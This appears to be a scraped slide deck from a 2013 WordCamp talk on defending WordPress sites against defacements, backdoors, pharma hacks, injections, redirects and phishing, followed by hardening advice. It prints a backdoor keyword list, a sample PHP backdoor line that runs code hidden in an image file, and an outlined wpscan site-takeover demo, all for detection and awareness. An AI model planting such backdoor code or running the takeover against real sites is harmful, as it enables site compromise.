View
117
Download
5
Category
Tags:
Preview:
DESCRIPTION
WordPress security at WordCamp Phoenix 2013.
Citation preview
WordPress Security
Dealing with Today’s Hacks
04/10/2023
If you don’t ask, you don’t get!
• Dre Armeda, CISSP• CEO, Co-Founder at Sucuri Inc.• @dremeda• Dre.im
I'm a Harley enthusiast, and a Chargers fan. I wear many hats, and love tacos. I'm infatuated with WordPress, web design, and web security. I work at Sucuri Security. I hope to help make the web a safer place!
Dre Armeda - @dremeda #wcphx
Why listen to me? You don’t have to, but…
• 12 years running IT, IS, Crypto, InfoSec & PhySec for the US Navy.– Managed security awareness for Sempra Energy– Deployed security suite for 1-800-Flowers.– Cleaned Martha Steward web properties of malware
• Not an expert, passionate enthusiast.• Seriously though – Quick Sucuri stats:
– Remediate 200 – 300 infected websites a day, • 24/7/365
– Perform 2 million + malware website scans a month– Support all CMS platforms and custom applications (e.g., WordPress, Joomla,
osCommerce, vBulletin, Drupal, .NET, etc… )
My goal in life is to make the web a safer place!
04/10/2023 Dre Armeda - @dremeda #wcphx
Thoughts To Kick Things Off
• Information Security is about risk reduction. – If you’re looking for the “silver bullet” this is the wrong
talk for you.• To think that you will never be infected is like saying
you will never be sick.– Someone tells you different – Percussion calibration time
• Prevention is ideal, but not realistic.– Risk will never be 0%– Detection is key.
04/10/2023 Dre Armeda - @dremeda #wcphx
Know Your Enemy
• They have time & resources• They are intelligent• Attacks are automated• Goal is to impact quantity• Own one, own them all…• It’s not personal
04/10/2023 Dre Armeda - @dremeda #wcphx
Ok, so what’s the problem?
TODAY’S ISSUES:• The Ecosystem /
Environment• Access Control • Software Vulnerabilities• Administration• Credential Management • Extensibility
04/10/2023 Dre Armeda - @dremeda #wcphx
Today’s Focus
• Ecosystem / Environment• Access Control• Dealing with Hacks
04/10/2023 Dre Armeda - @dremeda #wcphx
Logical Architecture
Linux Operating System
Apache
WordPress CPANEL Plesk phpMyAdmin PHP-CGI
MySQL
Modules
PHP
Modules
04/10/2023 Dre Armeda - @dremeda #wcphx
The EcoSystem / Environment
• Apache– Malicious module injects iFrames– http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-inject
s-iframes/
• phpMyAdmin– Mirror Hacked– http://sourceforge.net/blog/phpmyadmin-back-door/
• PHP-CGI– Remote Code Execution– http://blog.sucuri.net/2012/05/php-cgi-vulnerability-exploited-in-the-
wild.html• Plesk
– Vulnerable to SQLi attacks– http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html
04/10/2023 Dre Armeda - @dremeda #wcphx
The EcoSystem / Environment
• What can you do?– Not much… completely outside of your control if you’re
using a shared or managed host
• But, you can reduce risk...– Use a Dedicated / VPS Environment
• But recognize the responsibility that this entails, if you what I mentioned previously doesn’t make sense, skip to next step
– Go with a Managed Host• Doesn’t mean you’ll be safer, but it does mean you’ll have
resources to lean on
04/10/2023 Dre Armeda - @dremeda #wcphx
Access is Key
• We have to change the way we treat and think about access. All access – Server / Application
• We are going through the same mistakes servers and desktops were making in the 90’s with access.
• Know where you are surfing the web, do you really need to log in as an admin at the coffee shop?
04/10/2023 Dre Armeda - @dremeda #wcphx
Before We Dive In
04/10/2023 Dre Armeda - @dremeda #wcphx
WordPress Loving Infections
• Defacements• Backdoors• Pharma Hack• Injections– iFrame Specifically
• Malicious Redirects• Phishing
04/10/2023 Dre Armeda - @dremeda #wcphx
DEFACEMENTSHacktivism at its finest… you now support a cause!?!?!
Defacements
• Hacktivism 101– Annoying as S*&T
• Places to look:– Index.html– Index.php
• Root Directory• Wp-Content• Theme Directory
• GREP is your friend:– grep –ri ‘sniper399’ .
04/10/2023 Dre Armeda - @dremeda #wcphx
BACKDOORSIt’s ok to cry a little…
Backdoors• Common terms:
– Is_bot– Eval– Base64_decode– Fopen– Fclose– readfile– Edoced_46esad– Exec– System– Shell_exec– Gzuncompress– popen– FilesMan
04/10/2023 Dre Armeda - @dremeda #wcphx
PHARMA HACKErectile Dysfunction pills are leading ads.. Who knew..
Pharma Hack
• Multi-million $ Business• Rarely Distribute Malware• Impression based Affiliate Marketing• Google’s Search Engine Result Pages
(SERP)• Odds of malware distribution are
actually low• Tricks:
– Embedded within core files– Look for “.tmp” directories = >
04/10/2023 Dre Armeda - @dremeda #wcphx
Pharma Hack, cntd..
• Try using CURL to emulate Google and Windows:Curl –L –A “Googlebot/2.1(+http://www.google.com/bot.html)” http://someinfectedwebsite.com– Google Webmaster Tools
• Fetch as Google Bot
• Check your Theme Index.php file for things like this:– <?php
$wp__theme_icon=@create_function(”,@file_get_contents(‘/public_html/wp-content/themes/my-really-good-theme/images/s.jpg’));$wp__theme_icon(); ?>
04/10/2023 Dre Armeda - @dremeda #wcphx
Pharma Hack, cntd..
04/10/2023 Dre Armeda - @dremeda #wcphx
INJECTIONSIt only hurts for a minute…
Injections
• Invisible iFrame’s - Executing on your browser• Contributing to Drive-by-Downloads, Pharma, XSS, CSRF• Places to check – Pages that generate content:
– JS files, Header.php, Index.php, Function.php, Footer.php
04/10/2023 Dre Armeda - @dremeda #wcphx
Injections, cntd…
• PHP iFrame Injection =>– Count##.php– Check all Index.php /
Theme JS files– Example below:
04/10/2023 Dre Armeda - @dremeda #wcphx
Injections, cntd…
• Pharma Link Injections =>
• Drive-By-Downloads
04/10/2023 Dre Armeda - @dremeda #wcphx
MALICIOUS REDIRECTSWTF?!?! Why don’t I understand what it says?
Malicious Redirects
• Redirects your user to a domain distributing malware, fundamentally different than an iframe injection that executes in your browser
• 8 out of 10 times, check your .htaccess file – all of them– # find /var/www –name .htaccess –type f | wc –l
• Check for backdoors also – often a sign of a bigger issue
04/10/2023 Dre Armeda - @dremeda #wcphx
PHISHINGBiggest growing problem, exceptionally difficult to detect…
Phishing
• Growing at a faster pace than traditional web-malware
• No impact to readers, but tied to SPAM bots sending out emails like this:
04/10/2023 Dre Armeda - @dremeda #wcphx
Phishing, cntd…
04/10/2023 Dre Armeda - @dremeda #wcphx
DEMONSTRATIONBringing the Point Home
Demo Objective
• Use good tools for bad things – wpscan• Enumerate the users• Enumrate Passwords• Own target WordPress site• Deface the Website
I have 5 minutes – Ready?
04/10/2023 Dre Armeda - @dremeda #wcphx
KEEPING IT REALRemember the risk discussion?
Update• Oldest version found in production – 1.5• Leading cause of cross-site contamination issues• Perhaps the simplest of tasks, yet we still find this:
04/10/2023 Dre Armeda - @dremeda #wcphx
Access is Key• On the Server:– Kill accounts that are not in use– FTP is the devil – slap yourself and switch to SFTP– Disable password auth & use key pairs
• WordPress Admin:– Multi-Factor Authentication on wp-admin– Two-Factor Authentication on wp-login.php
• Employ least privileged:– Only use admin accounts for admin tasks– Learn to use Editor, Author, Contributor, Subscriber
04/10/2023 Dre Armeda - @dremeda #wcphx
Password Dilemma• 15 character pass
– 3 months to crack• Long / Complex / Unique
– Key to Passwords• Prefer Password Manager
– You don’t? ok..– Passphrases work too
• iLuvWCLpHX:2013:S@nT@N b@By
• Come up with a process & stick to it:– One scheme:
• Remember 8 characters• Write Down 8 characters• Save 20 characters
– Second scheme:• Remember 20 characters• Prefix characters with site name• End sequence with some date04/10/2023 Dre Armeda - @dremeda #wcphx
Kill PHP Execution
• Kill PHP Execution – Directories:• WP-INCLUDES• WP-CONTENT• UPLOADS – At a minimum
<Files *.php>Deny from all</Files>
04/10/2023 Dre Armeda - @dremeda #wcphx
Disable Theme / Plugin Editor
I’d take it a step further and remove the ability to install, but that’s just me.
Modify WP-CONFIG.PHP With:
• Disable the Plugin / Theme Editor– Define(‘DISALLOW_FILE_EDIT’,true);
- OR -
• Disable the Plugin / Theme Update and Installation– Define(‘DISALLOW_FILE_MODS’,true);
04/10/2023 Dre Armeda - @dremeda #wcphx
Plugins That Help
Sucuri Clients• Sucuri Security Plugin• Theme-Check• BackupBuddy• Akismet
Non-Clients• Limit Login Attempts• Theme-Check• BackupBuddy• Akismet
04/10/2023 Dre Armeda - @dremeda #wcphx
Need a Hand?Support Forums
• Sucuri Blog: http://blog.sucuri.net• SiteCheck Scanner:
http://sitecheck.sucuri.net• Unmask Parasites:
http://unmaskparasites.com• Perishable Press:
http://perishablepress.com/category/web-design/security/
• Secunia Security Advisories: http://secunia.com/community/advisories/search/?search=wordpress
Online Resources
• Hacked – http://wordpress.org/tags/hacked
• Malware – http://wordpress.org/tags/malware
• BadwareBusters – https://badwarebusters.org
04/10/2023 Dre Armeda - @dremeda #wcphx
Dre Armeda, CISSPDre.im
@dremeda
Sucuri Inc.http://sucuri.net http://blog.sucuri.net
@sucuri_security
04/10/2023 Dre Armeda - @dremeda #wcphx
Thanks to Tony Perez @perezbox for allowing me to cannibalize his slide deck.
Recommended